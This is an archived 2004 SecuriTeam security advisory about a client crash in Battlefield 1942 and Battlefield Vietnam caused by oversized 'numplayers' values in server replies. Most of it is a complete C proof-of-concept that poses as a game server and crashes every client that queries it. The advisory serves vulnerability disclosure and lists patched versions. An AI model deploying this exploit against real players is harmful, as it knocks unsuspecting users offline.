[NT] Battlefield 1942 and Vietnam Broadcast Client Crash

From: SecuriTeam (support_at_securiteam.com)
Date: 12/12/04

  • Next message: SecuriTeam: "[NT] Remote Execute DoS Attack Leads to Client Crash"
    To: list@securiteam.com
    Date: 12 Dec 2004 10:28:14 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Battlefield 1942 and Vietnam Broadcast Client Crash
    ------------------------------------------------------------------------

    SUMMARY

    Battlefield 1942 and Vietnam are two of the most known and played FPS
    games based on the relative military conflicts. They are developed by
    <http://www.dice.se> Digital Illusions and have been released respectively
    at September 2002 and March 2004.

    A vulnerability in the way Battlefield 1942 and Vietnam parsers incoming
    data allows an attacker to cause the program to crash.

    DETAILS

    Vulnerable Systems:
     * Battlefield 1942 versions 1.6.19 and prior
     * Battlefield Vietnam versions 1.2 and prior

    Immune Systems:
     * Battlefield 1924 version 1.6.1b
     * Battlefield Vietnam version 1.21b

    Just like any other multiplayer server, Battlefield contacts a master
    server and queries it in order to discover the existence of other game
    servers. The client then queries each of the game servers for information
    about games which is displayed in the in-game display browser.

    A problem exists while parsing replies from game servers. When a very
    large number of players ("numplayers" parameter) is reported to the
    client, by a server, the client freezes completely and a few seconds later
    will generate a fault due to an access to a NULL pointer.

    This is a passive broadcast attack in which an attacker is able to crash
    any client if the attacker is visible on the game server.

    A proof of concept code for this Denial Of Service vulnerability is listed
    below.

    Proof Of Concept
    /*

    by Luigi Auriemma

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>
    #endif

    #define VER "0.1"
    #define BUFFSZ 2048
    #define BOOMPLAYERS 2147483647 /* BUG */
    #define BOOM "\\gamename\\%s" \
                        "\\gamever\\1.6" \
                        "\\location\\0" \
                        "\\hostname\\crash" \
                        "\\hostport\\%d" \
                        "\\mapname\\aberdeen" \
                        "\\numplayers\\%u" \
                        "\\maxplayers\\%u" /* not needed to be the same value
    */ \
                        "\\final\\" \
                        "\\queryid\\1.1"

    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                len,
                pcklen,
                on = 1,
                psz;
        u_short port;
        u_char buff[BUFFSZ + 1],
                pck[BUFFSZ + 1];

        setbuf(stdout, NULL);

        fputs("\n"
            "Battlefield broadcast client crash "VER"\n"
            " 1942 <= 1.6.19 and Vietnam <= 1.2\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 3) {
            printf("\n"
                "Usage: %s <game> <port>\n"
                "\n"
                "Game:\n"
                " bfvietnam = Battlefield Vietnam\n"
                " bfield1942 = Battlefield 1942\n"
                " bfield1942sw = Battlefield 1942: Secret Weapons of WW2\n"
                " bfield1942rtr = Battlefield 1942: Road to Rome\n"
                " bfield1942swd = Battlefield 1942: Secret Weapons of WW2
    Demo\n"
                " bfield1942d = Battlefield 1942 Demo\n"
                "\n"
                "Port:\n"
                " 23000 = default Internet port\n"
                " 22000 = default LAN port\n"
                "\n", argv[0]);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        port = atoi(argv[2]);

        peer.sin_addr.s_addr = INADDR_ANY;
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;
        psz = sizeof(peer);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
          < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        pcklen = snprintf(
            pck,
            BUFFSZ,
            BOOM,
            argv[1],
            port,
            BOOMPLAYERS,
            BOOMPLAYERS);
        if((pcklen < 0) || (pcklen > BUFFSZ)) exit(1);

        fputs("Clients:\n", stdout);
        for(;;) {
            len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
    &psz);
            if(len < 0) continue;
            buff[len] = 0x00;

            printf("%16s:%5hu %s\n",
                inet_ntoa(peer.sin_addr), ntohs(peer.sin_port),
                buff);

            if(sendto(sd, pck, pcklen, 0, (struct sockaddr *)&peer,
    sizeof(peer))
              < 0) std_err();
        }

        close(sd);
        return(0);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Remote Execute DoS Attack Leads to Client Crash"

    Relevant Pages

    • [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise management system for large amounts of HP ... The web server is a modular service ... HP Web JetAdmin uses it's own encryption. ...
      (Securiteam)
    • [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were discovered in the (Oracle database server ... password is required to exploit this vulnerability. ...
      (Securiteam)
    • [NEWS] ColdFusion MX Oversize Error Message DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution for building and deploying powerful web ... shoots up and stays there until the server completes writing the error ... a long string of data as a GET or POST request to ...
      (Securiteam)
    • [NT] F-Secure Internet Gatekeeper Content Scanning Server DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.f-secure.com/products/anti-virus/fsigk/> F-Secure Internet ... the Content Scanner Server. ... The vendor has been contacted and confirmed the existence of the problem ...
      (Securiteam)
    • [NEWS] TCLHttpd Contains Two Vulnerabilities (Directory Browsing, XSS)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... general-purpose Web server, and as a framework for building server ... Instructions for setting up the TclHttpd on your ... server context (Cross Site Scripting). ...
      (Securiteam)